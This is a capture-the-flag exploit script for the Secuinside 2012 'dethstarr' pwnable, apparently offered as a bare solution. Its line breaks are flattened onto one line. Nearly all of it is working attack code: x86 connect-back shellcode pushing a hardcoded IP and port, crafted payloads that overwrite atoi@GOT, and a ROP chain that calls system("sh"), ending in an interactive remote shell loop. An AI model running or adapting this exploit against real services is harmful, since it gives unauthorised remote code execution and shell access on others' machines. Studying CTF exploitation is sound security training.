Secuinside 2012 Quals - Dethstarr (Exploit only)
Category : Pwnables
nickname: dethstarr
HINT: 61.42.25.25:8080
binary: http://61.42.25.25/dethstarr
CentOS 6.2 / randomize_va_space 2 / exec-shield 1 |
dethstarrSummary : Invalid use of index , overwrite GOT
#!/usr/bin/python from socket import * from struct import pack , unpack import time import random def h(x): return pack('<l',x) def g(x): return pack('<h',x) HOST = "127.0.0.1" PORT = 8181 SHELLCODE = \ "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89"+\ "\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x6e\x08"+\ "\xe7\x1e\x66\x68\x7a\x69\x66\x53\x6a\x10"+\ "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80"+\ "\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"+\ "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+\ "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd"+\ "\x80" freespace1 = 0x0804adac heap_buffer = 0x0804a8e4 lift_esp = 0x08049534 leave_ret = 0x080491fb read_plt = 0x080483f4 write_plt = 0x080483c4 rwx_ptr = 0x804a7b0 pppr = 0x080495b6 ###################################### Value 2 ######################################## payload1 = h(0xca) + h(0x00) + h(0x01) + h(0xac) + h(0x9a) + h(0x01) + g(0x00) + g(0x00) + g(0x01) + g(0x01) + "INST" + h(0x1f) ######################################################################################## ###################################### Value 2 ######################################## payload2_1 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x01) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f) payload2_2 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x03) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f) payload2_3 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x04) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f) payload2_4 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x05) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f) payload2_4_2 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x05) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x123) ######################################################################################## ####################################### Value 3 ######################################## payload3_1 = g(0xcb) + g(0x1a) + g(0xdb) + g(0x02) + h(0x19) + h(0x06) + h(0x00) + h(0xca) + h(0xcccccccc) + h(0x01) + h(0x1f) payload3_2 = g(0xcb) + g(0x1a) + g(0xdb) + g(0x02) + h(0x19) + h(0x06) + h(0x00) + h(0xca) + h(0xcccccccc) + h(0x00) + h(0x1f) payload3_3 = g(0xcb) + g(0x1a) + g(0xdb) + g(0x02) + h(0x19) + h(0x06) + h(0x00) + h(0xca) + h(0xcccccccc) + h(0x02) + h(0x1f) ######################################################################################## ####################################### Value 4 ######################################## payload4_1 = h(lift_esp) + h(0x01) + h(0xbfffffbf) + h(0xbfffffbf) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x03) + h(0x1f) # overwrite atoi@got payload4_2 = h(freespace1) + h(0x01) + h(0x08) + h(0x08) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x00) + h(0x1f) # for payload payload4_3 = h(44) + h(0x01) + h(0x09) + h(0x09) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x00) + h(0x1f) # for payload payload4_4 = h(0x01) + h(0x01) + h(0x1f) + h(0x1f) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x02) + h(0x1f) # Nothing ######################################################################################## s = socket(AF_INET , SOCK_STREAM) s.connect((HOST,PORT)) pList = [payload1, payload2_1, payload2_2, payload2_3, payload2_4, payload3_1, payload3_2, payload3_3, payload4_1, payload4_2, payload4_3, payload4_4, payload2_4_2] recvList = [0, 1, 5, 8, 9, 10, 11] ddd="" msg = "a"*(0x1f-18) + h(heap_buffer) + h(leave_ret) + "a"*10 raw_input("gogo? > ") ############################ Send Check Values and Payloads #################### for payload, idx in zip(pList, range(len(pList))) : if idx in recvList: sData = s.recv(1024) print "[<<] Msg" time.sleep(0.5) print "[>>] Send Payload ", idx s.send(payload+"") time.sleep(0.3) print "[>>] Send Msg" if idx == 4: # payload2_4 ddd = "aaaa" + h(freespace1-4) + h(leave_ret+1) * 3 + h(read_plt) + h(leave_ret) ddd += "\x00"*(0x1f-4*7) elif idx == len(pList)-1: # payload2_4_2 break else: ddd = msg s.send(ddd+"") time.sleep(0.3) ################################################################################# print "good good.." time.sleep(1) offset = 0x80482bb - 0x0804826c # &"atoi" - &.strtab strtab_ptr = 0x804a704 # &.DYNAMIC + 36 atoi_dyn = 0x804842a # atoi@plt + 6 ############################### Send Final ROP payload ########################## attack = h(read_plt) + h(pppr) + h(0x0) +h(strtab_ptr) + h(0x4) # read(0 , strtab_ptr , 4) attack += h(atoi_dyn) + h(0xdeadbeef) + h(freespace1 + 40) attack += "system\x00\x00" + "sh\x00\x00" s.send(attack) # send final payload s.send(h(freespace1 + 32 - offset)) # send &"system" - offset ################################################################################# time.sleep(0.5) ############################### Got SHELL ####################################### while 1: cmd = raw_input("$ ") s.send(cmd + "\n") if cmd == "exit": break print s.recv(1024) ################################################################################# s.close() |